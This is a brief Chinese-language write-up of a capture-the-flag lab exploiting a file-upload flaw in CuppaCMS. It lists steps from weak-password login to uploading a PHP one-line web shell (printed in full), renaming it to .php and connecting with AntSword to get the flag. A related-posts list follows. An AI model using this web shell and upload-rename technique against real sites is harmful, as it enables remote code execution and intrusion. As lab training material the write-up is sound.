简介
CuppaCMS是一套内容管理系统(CMS)。 CuppaCMS 2019-11-12之前版本存在安全漏洞,攻击者可利用该漏洞在图像扩展内上传恶意文件,通过使用文件管理器提供的重命名函数的自定义请求,可以将图像扩展修改为PHP,从而导致远程任意代码执行。
正文
1.进入靶场
2.弱口令登录admin\admin
3.上传一句话木马图片
<?php @eval($_POST['cmd']);?>
4.删除配置文件
5.重命名图片,抓包更改文件后缀
6.蚁剑连接
7.得到flag
相关推荐
jjyangyou2 小时前
物联网核心安全系列——物联网安全需求AltmanChan3 小时前
大语言模型安全威胁马船长3 小时前
红帆OA iorepsavexml.aspx文件上传漏洞hikktn10 小时前
如何在 Rust 中实现内存安全:与 C/C++ 的对比分析23zhgjx-NanKon12 小时前
华为eNSP:QinQ23zhgjx-NanKon12 小时前
华为eNSP:mux-vlan昔我往昔12 小时前
阿里云文本内容安全处理Lionhacker13 小时前
网络工程师这个行业可以一直干到退休吗?centos0814 小时前
PWN(栈溢出漏洞)-原创小白超详细[Jarvis-level0]棱角~~15 小时前
盘点和嗨格式一样好用的10款数据恢复!!